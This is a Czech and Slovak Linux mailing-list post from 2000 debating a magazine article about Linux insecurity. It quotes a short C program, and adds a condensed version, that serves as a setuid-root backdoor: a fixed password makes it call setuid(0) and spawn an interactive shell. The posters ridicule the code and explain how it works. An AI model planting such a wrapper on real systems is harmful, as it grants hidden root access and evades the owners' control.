Bezpecnost Linuxu

Ondrej Sury ondrej na globe.cz
Pondělí Květen 29 16:52:12 CEST 2000 

Libor Chocholaty wrote:
> 
> Ondrej Sury wrote:
> 
> > uhlar na fantomas.sk wrote:
> > >
> > > Jan Kasprzak <kas na informatics.muni.cz> wrote:
> > > ->      Pan Janda dnes zveoejnil na Neviditelném Psu další elánek,
> > > -> který má dokázat, jak je Linux nebezpeený. Odvozuje to z toho,
> > > -> 3/4e k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvooí
> > > -> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
> > > -> je-li superu3/4ivatelem.
> > >
> > > Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...
> > >
> > > /* ------------start root.c------------- */
> > >
> > > main(argc, argv)
> > >         int argc;
> > >         char **argv;
> > > {
> > > char seteuid[10];
> > > char showmount[10];
> > >
> > >         seteuid[0]='h';
> > >         seteuid[1]='a';
> > >         seteuid[2]='k';
> > >         seteuid[3]='e';
> > >         seteuid[4]='r';
> > >         seteuid[5]='%%%%%';
> > >         showmount[0]='/';
> > >         showmount[1]='b';
> > >         showmount[2]='i';
> > >         showmount[3]='n';
> > >         showmount[4]='/';
> > >         showmount[5]='b';
> > >         showmount[6]='a';
> > >         showmount[7]='s';
> > >         showmount[8]='h';
> > >         showmount[9]='%%%%%';
> > >         if (argc>1) {
> > >            if (!strcmp(argv[1],seteuid)) {
> > >                 setuid(0);
> > >                 setgid(0);
> > >                 execl(showmount,"-i",0);
> > >            }
> > >         }
> > > }
> > >
> > > /* ---------konec root.c----------- */
> >
> > No ja si z myslim, ze schvalne pise blaboly, protoze se mi zda, ze
> > tomu tak nejak rozumi.  (Teda pokud tenhle zdrojak neni vyhrabany
> > z nejake konference, o cemz pochybuji, protoze tohle se neda
> > napsat neumyslne.)
> >
> 
> A co to ma delat?

Tenhle programek (kdyby v nem nebyly chyby) nedela nic jineho nez
ze spusti bash.  A pokud ma nastaveny setuid bit a vlastnikem je
root, tak jej pusti s rootovskymi pravy.  Zkracena verze vypada takto:

main(int argc, char **argv) {
	if (argc>1 && !strcmp(argv[1],"haker")) {
		setuid(0); setgid(0);
		execl("/bin/sh", "-i", 0);
	}
}

A tudiz si myslim, ze program uvedeny na NP musi byt bud vyplodem
uplneho (s prominutim) pitomce anebo (coz je nanejvys pravdepodobne)
provokatera.

-- 
Ondrej Sury <ondrej na sury.cz> Globe Internet s.r.o. http://globe.cz/
Tel: +420235365000 Fax: +420235365009  Planickova 1, 162 00 Praha 6
Mob: +420602667702 ICQ: 24944126      Mapa: http://globe.namape.cz/
NAJDI.TO http://najdi.to/                 PRESS.CZ http://press.cz/

Další informace o konferenci Linux